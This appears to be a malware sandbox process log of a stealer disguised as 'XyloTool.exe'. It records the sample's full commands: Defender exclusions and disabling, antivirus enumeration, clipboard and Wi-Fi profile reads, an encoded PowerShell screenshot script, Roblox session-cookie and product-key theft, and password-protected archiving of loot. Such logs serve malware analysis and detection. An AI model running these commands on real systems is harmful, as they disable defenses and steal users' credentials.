"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.31.359620658\229773335" -childID 28 -isForBrowser -prefsHandle 5924 -prefMapHandle 3572 -prefsLen 31301 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82902407-8125-4072-949a-d41f9ac4de56} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10824 2fedebf8958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.32.1891966997\666259169" -childID 29 -isForBrowser -prefsHandle 10312 -prefMapHandle 10324 -prefsLen 31301 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6b41c96-b6fa-48c4-9ec6-efbfaacc580b} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10300 2fedf978e58 tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\XyloTool.rar
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.33.165701030\877517440" -childID 30 -isForBrowser -prefsHandle 8640 -prefMapHandle 6980 -prefsLen 31397 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e64a8df2-0176-4ab7-bb2d-976018e0fc5e} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10932 2fed0b77b58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.34.1724721587\413791983" -childID 31 -isForBrowser -prefsHandle 10720 -prefMapHandle 3836 -prefsLen 31406 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e748b28b-dc44-495d-9cc7-44fb77058598} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10708 2fed0f8ee58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.35.195616879\550843068" -childID 32 -isForBrowser -prefsHandle 10848 -prefMapHandle 10832 -prefsLen 31406 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91a25632-112b-4bed-95cb-81e2f9f2c27c} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10788 2fed407fb58 tab
C:\Users\Admin\Downloads\winrar-x64-701.exe
"C:\Users\Admin\Downloads\winrar-x64-701.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\XyloTool.rar
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\XyloTool.rar"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\41984dd47e114aa2859cd35371f64bc8 /t 7244 /p 2000
C:\Users\Admin\Desktop\XyloTool.exe
"C:\Users\Admin\Desktop\XyloTool.exe"
C:\Users\Admin\Desktop\XyloTool.exe
"C:\Users\Admin\Desktop\XyloTool.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\35lrmyfg\35lrmyfg.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4A6E.tmp" "c:\Users\Admin\AppData\Local\Temp\35lrmyfg\CSCC988D1B75F8349DF868935A8C4D69627.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48362\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\bp001.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI48362\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI48362\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\bp001.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Users\Admin\Desktop\XyloTool.exe
"C:\Users\Admin\Desktop\XyloTool.exe"
C:\Users\Admin\Desktop\XyloTool.exe
"C:\Users\Admin\Desktop\XyloTool.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwA